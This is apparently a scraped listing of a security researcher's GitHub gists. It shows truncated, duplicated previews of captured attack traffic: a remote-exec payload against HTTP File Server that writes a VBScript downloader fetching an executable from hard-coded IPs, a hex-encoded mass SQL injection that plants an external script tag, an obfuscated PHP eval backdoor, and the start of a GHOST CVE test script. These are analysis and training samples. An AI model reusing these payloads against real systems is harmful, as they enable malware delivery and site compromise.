Ryan Barnett rcbarnett-zz

## gist:ffe3830e6aa41a03f52c
--VSvmJH8AAQEAAFev-sYAAABf-A--
[13/Apr/2015:15:52:07 +0000] VSvmJH8AAQEAAFev-sYAAABf 62.210.93.179 33589 192.168.0.222 3128
--VSvmJH8AAQEAAFev-sYAAABf-B--
POST http://REDACTED/hostdata21.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: REDACTED
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 1361
Content-Type: application/x-www-form-urlencoded

## HTTP File Server Exploit Code
{.exec | cmd.exe / c echo > 22222.vbs dim wait, quit, out: Set xml = CreateObject("Microsoft.XMLHTTP"): Set WshShell = Wscript.CreateObject("WScript.Shell"): DS = Array("123.108.109.100", "123.108.109.100:53", "123.108.109.100:443", "178.33.196.164", "178.33.196.164:53", "178.33.196.164:443"): for each Url in DS: wait = true: quit = false: D(Url): if quit then: exit
	for: end
	if :next: Sub D(Url): if IsObject(xml) = false then: Set xml = CreateObject("Microsoft.XMLHTTP"): end
	if :xml.Open "GET",
	"http://" ^ & Url ^ & "/getsetup.exe",
	True: xml.OnReadyStateChange = GetRef("xmlstat"): out = Now: xml.Send(): while (wait and 60 ^ > abs(datediff("s", Now, out))): wscript.sleep(1000): wend: End Sub: sub xmlstat(): If xml.ReadyState ^ < ^ > 4 Then: exit sub: end
	if :wait = false: if xml.status ^ < ^ > 200 then: exit sub: end
	if :quit = true: on error resume next: set sGet = CreateObject("ADODB.Stream"): sGet.Mode = 3: sGet.Type = 1: sGet.Open(): sGet.Write xml.ResponseBody: sGet.SaveToFile "ko.exe",
	2: End su

## Analysis Challenge #1
Review this HTTP request -

GET /somedir/somfile.asp?arg1=SOMETHING;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522053454c45435420612e6e616d652c622e6e616d652046524f4d207379736f626a6563747320612c737973636f6c756d6e73206220574845524520612e69643d622e696420414e4420612e78747970653d27752720414e442028622e78747970653d3939204f5220622e78747970653d3335204f5220622e78747970653d323331204f5220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d525452494d28434f4e5645525428564152434841522834303030292c5b272b40432b275d29292b27273c736372697074207372633d73646f2e313030306d672e636e2f63737273732f772e6a733e3c2f7363726970743e27272729204645544348204e4558542046524f4d205461626c655f437

## ghost_xmlrpc.rb
#
# --[ Trustwave SpiderLabs Research Team ]--
# Ref: http://blog.spiderlabs.com/2015/01/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235.html
#
require "net/http"
require "uri"

if ARGV.count != 2
  puts "Usage: #{ARGV[0]} [Target URL] [count]"
  exit

## gist:9375075
<?php eval(gzinflate(str_rot13(base64_decode('tUl4QttVFP28VfyHbjaSHRV52NVXFWBHTZwSaCF5HPYLIHhvQpIpfnZzDHER/33vnbHzKNClRTdPwrnn3NfxnTvhRZYylrwqpRbF1N3tHnlhiAlkt4RFXLudOAqjqD84v2XGLJ2x5Na56Wl/bNzc6NwJJWdF1oUmAdkFt849H8Mjugz/DodK9Gc0uohCB9GI3iAsiq948DD86zKMU/HlsGIJ4zKdA4OOmJxlWkWhbF7fsoJcFxgbA0PkKTbh+WHKgftOFCIGsuugMc7LlDuLFhbELmzsKJ7UReg5xI+Oe258NjgJIcCg16MHQpsbPEb8O6xmIJnUXElcBpBkSSo9nhcs5+6iJcf+j49CQYagRtM0v9WlhCCvOQ3Ds8EoXGTKmchcCm1C67n6MEkpGrykzOk2oVMlulpCmRIZ+ci+Mkd1pmi17/utWSBL28lo0b8gEZdqHHh1GrguCEv7Q1sCtYG5LZOaol9r6eC7B9BFqRc4794ZkcTEeofnZji6ZZKsLDiODUGNKniZ8NU5Y6JCw/7FKO71/wzPj89Px8xPypUWJEuyQQafLs/C80Q8HAxTzo1U/Sqrp6JDfg09+fyhylfJvXdJ4YxVYVK26baJjde1HfzEAdp/0wDt2wECRTIrCT3UT3T86CM7+VzPI7JQTy0SlpFGQ/HQt+DhSx5uI42HORrjdkVPk8Gvu+azikJXOIZX/MOD38iC1OsB6WN8Ub1STB499MeL4B0wxihfQF3qgQoxGEA6eoxh16Pdt+a4BAfosxZ2YCLlZmuECIsUHiXTJTj9Flwt61r58P1PT4piPK7N2+6uh5nUUqJSTJDqHpIRnL7kPrUHMU6TndVBHSgtckgqF/F6x2rMqBp1C7GMFwbq7uwhILmuck7Q4gG5ffmPK2lmDhr7WCmur38kB7BfQtIkT8kckFnmJMc9A1df4OYlzHUQQ230kqDvzQcF/UfmOSvSScBQREe1Jm
	--VSvmJH8AAQEAAFev-sYAAABf-A--
	[13/Apr/2015:15:52:07 +0000] VSvmJH8AAQEAAFev-sYAAABf 62.210.93.179 33589 192.168.0.222 3128
	--VSvmJH8AAQEAAFev-sYAAABf-B--
	POST http://REDACTED/hostdata21.php HTTP/1.1
	User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
	Host: REDACTED
	Accept: /
	Proxy-Connection: Keep-Alive
	Content-Length: 1361
	Content-Type: application/x-www-form-urlencoded
	{.exec \| cmd.exe / c echo > 22222.vbs dim wait, quit, out: Set xml = CreateObject("Microsoft.XMLHTTP"): Set WshShell = Wscript.CreateObject("WScript.Shell"): DS = Array("123.108.109.100", "123.108.109.100:53", "123.108.109.100:443", "178.33.196.164", "178.33.196.164:53", "178.33.196.164:443"): for each Url in DS: wait = true: quit = false: D(Url): if quit then: exit
	for: end
	if :next: Sub D(Url): if IsObject(xml) = false then: Set xml = CreateObject("Microsoft.XMLHTTP"): end
	if :xml.Open "GET",
	"http://" ^ & Url ^ & "/getsetup.exe",
	True: xml.OnReadyStateChange = GetRef("xmlstat"): out = Now: xml.Send(): while (wait and 60 ^ > abs(datediff("s", Now, out))): wscript.sleep(1000): wend: End Sub: sub xmlstat(): If xml.ReadyState ^ < ^ > 4 Then: exit sub: end
	if :wait = false: if xml.status ^ < ^ > 200 then: exit sub: end
	if :quit = true: on error resume next: set sGet = CreateObject("ADODB.Stream"): sGet.Mode = 3: sGet.Type = 1: sGet.Open(): sGet.Write xml.ResponseBody: sGet.SaveToFile "ko.exe",
	2: End su
	Review this HTTP request -

	GET /somedir/somfile.asp?arg1=SOMETHING;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522053454c45435420612e6e616d652c622e6e616d652046524f4d207379736f626a6563747320612c737973636f6c756d6e73206220574845524520612e69643d622e696420414e4420612e78747970653d27752720414e442028622e78747970653d3939204f5220622e78747970653d3335204f5220622e78747970653d323331204f5220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d525452494d28434f4e5645525428564152434841522834303030292c5b272b40432b275d29292b27273c736372697074207372633d73646f2e313030306d672e636e2f63737273732f772e6a733e3c2f7363726970743e27272729204645544348204e4558542046524f4d205461626c655f437
	#
	# --[ Trustwave SpiderLabs Research Team ]--
	# Ref: http://blog.spiderlabs.com/2015/01/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235.html
	#
	require "net/http"
	require "uri"

	if ARGV.count != 2
	puts "Usage: #{ARGV[0]} [Target URL] [count]"
	exit